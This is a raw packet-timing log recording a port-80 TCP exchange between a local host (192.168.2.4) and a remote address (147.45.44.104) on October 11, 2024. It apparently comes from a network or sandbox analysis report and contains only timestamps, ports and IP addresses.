                                                                                                                                                      Oct 11, 2024 23:07:04.478848934 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.478871107 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.478878975 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.478912115 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.478930950 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.478943110 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.478976965 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.478991032 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.479013920 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.479047060 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.479074955 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.479078054 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.479116917 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.479134083 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.479145050 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.479193926 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.479196072 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.479228020 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.479260921 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.479275942 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.479310036 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.479343891 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.479358912 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.479377031 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.479435921 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.568851948 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.568869114 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.568936110 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.570116043 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.570266962 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.570281982 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.570297003 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.570312977 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.570319891 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.570327044 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.570342064 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.570353031 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.570384026 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.570391893 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.570396900 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.570421934 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.570480108 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.570503950 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.570518017 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.570530891 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.570540905 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.570545912 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.570552111 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.570568085 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.570579052 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.570581913 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.570595980 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.570610046 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.570616007 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.570622921 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.570636988 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.570662022 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.570703983 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.570722103 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.570736885 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.570758104 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.570770979 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.570780993 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.570785046 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.570800066 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.570805073 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.570842981 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.570868015 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.620882988 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.658489943 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.658524036 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.658555984 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.658570051 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.658572912 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.658584118 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.658600092 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.658607960 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.658613920 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.658627987 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.658642054 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.658648014 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.658657074 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.658682108 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.658710003 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.658801079 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.658819914 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.658834934 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.658849001 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.658857107 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.658863068 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.658876896 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.658890963 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.658895969 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.658914089 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.658924103 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.658937931 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.658951998 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.658957958 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.658967018 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.658981085 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.659003019 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.659017086 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.659034967 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.659039021 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.659054041 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.659069061 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.659085035 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.659112930 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.659192085 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.659204960 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.659219027 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.659233093 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.659262896 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.659302950 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.749530077 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.749581099 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.749614954 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.749646902 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.749669075 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.749680042 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.749711990 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.749711990 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.749756098 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.749759912 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.749792099 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.749835014 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.749838114 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.749870062 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.749901056 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.749912024 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.749932051 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.749964952 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.749977112 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.749995947 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.750026941 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.750036955 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.750058889 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.750089884 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.750099897 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.750140905 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.750174046 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.750185966 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.750205994 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.750237942 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.750247002 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.750268936 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.750299931 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.750309944 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.750330925 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.750371933 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.750381947 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.750411987 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.750443935 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.750453949 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.750474930 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.750508070 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.750518084 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.750543118 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.750588894 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.838608980 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.838664055 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.838715076 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.838747025 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.838745117 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.838798046 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.838803053 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.838829041 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.838861942 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.838880062 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.838891983 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.838924885 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.838937044 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.838957071 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.838990927 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.839016914 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.839019060 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.839051962 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.839066029 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.839164019 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.839212894 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.839214087 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.839247942 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.839278936 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.839299917 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.839334965 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.839385033 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.839418888 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.839449883 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.839481115 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.839497089 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.839514017 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.839548111 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.839560986 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.839576960 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.839627028 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.839735031 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.839765072 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.839796066 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.839812040 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.839828014 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.839859009 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.839876890 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.839891911 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.839924097 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:04.839941025 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:04.882440090 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:05.108809948 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:05.108856916 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:05.108920097 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:05.108952045 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:05.108973980 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:05.109008074 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:05.109019995 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:05.109040976 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:05.109072924 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:05.109081984 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:05.109106064 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:05.109138012 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:05.109148026 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:05.109169960 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:05.109201908 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:05.109210014 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:05.109236002 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:05.109277010 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:05.109285116 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:05.109318018 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:05.109349012 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:05.109364986 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:05.109380960 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:05.109412909 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:05.109425068 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:05.109443903 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:05.109476089 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:05.109491110 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:05.109508038 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:05.109539032 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:05.109551907 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:05.109570026 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:05.109615088 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:05.109617949 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:05.109649897 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:05.109680891 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:05.109694004 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:05.109711885 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:05.109740019 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:05.109767914 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:05.109771013 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:05.109802961 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:05.109813929 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:05.109838963 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:05.109869957 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:05.109884024 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:05.109900951 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:05.109932899 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:05.109946012 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:05.109966993 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:05.109999895 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:05.110011101 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:05.110030890 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:05.110049009 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:05.110063076 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:05.110090971 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:05.110112906 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:05.110121965 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:05.110153913 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:05.110176086 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:05.110203028 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:05.110248089 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:05.110251904 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:05.110284090 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:05.110315084 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:05.110328913 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:05.110348940 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:05.110380888 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:05.110394955 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:05.110411882 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:05.110444069 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:05.110455036 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:05.110475063 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:05.110507011 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:05.110521078 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:05.110537052 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:05.110569954 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:05.110582113 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:05.110600948 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:05.110632896 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:05.110644102 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:05.110663891 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:05.110696077 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:05.110706091 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:05.110727072 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:05.110759020 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:05.110769987 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:05.110789061 CEST8049730147.45.44.104192.168.2.4
